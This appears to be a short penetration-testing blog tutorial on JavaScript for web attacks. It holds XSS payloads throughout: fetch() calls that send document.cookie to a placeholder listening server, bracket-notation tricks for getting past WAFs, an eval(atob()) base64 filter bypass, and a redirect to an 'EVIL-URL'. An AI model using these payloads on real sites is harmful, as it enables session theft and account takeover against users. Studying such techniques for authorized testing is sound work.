JavaScript for Penetration Testing

JavaScript is a crucial skill for web application penetration testing. This can present a challenege if you don’t have a background in coding or any practical experience with JavaScript as a language. I’ve compiled this page - which I will update as I go - to list JavaScript concepts and payloads that are useful for penetration testing.

Please note: This page assumes some familiatiry with coding concepts (such as methods), and penetration testing techniques. I will include references and links where relevant. Please let me know if I have missed anything, or if something could be better.

Bracket vs Dot Notation

In JavaScript you can access properties of methods and objects in a few ways. One way that might be familiar to you already is dot notation, for example, a common XSS payload is: document.cookie

However, if this payload doesn’t work due to a WAF or a blocklist try bracket notation: document['cookie']

To take this example one step further, you could use a global variable with bracket notation to try execute the same payload: window["document"]["cookie"]

Fetch function

Stop trying to make fetch happen… But seriously, if you ever need to use this method here are some things to keep in mind:

Can be used to make a GET request, for example to retrieve a cookie:

fetch('https://YOUR-LISTENING-SERVER.com/?session=' + window["document"]["cookie"])"

Can be used to make a POST request:

<script>
fetch('https://YOUR-LISTENING-SERVER', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

XSS - Bypass use case

The following example was used in a training lab:

-eval(atob("BASE64-PAYLOAD"))

The Base64 payload included a fetch() command with a reflected XSS payload to alert(document[‘cookie’]). The fetch() method was blocked so the following steps allowed the payload to execute:

  1. Base64 encode the fetch command
  2. atob() - This decodes the payload
  3. eval() - This executes the commands inside the parenthesis

location

When embedding or delivering a payload from a different origin to the ‘victim site’ you may not be able to use an iframe. Instead you can try the following script where the location method effectively redirects a user to the supplied URL:

<script>
  location = 'EVIL-URL'
</script>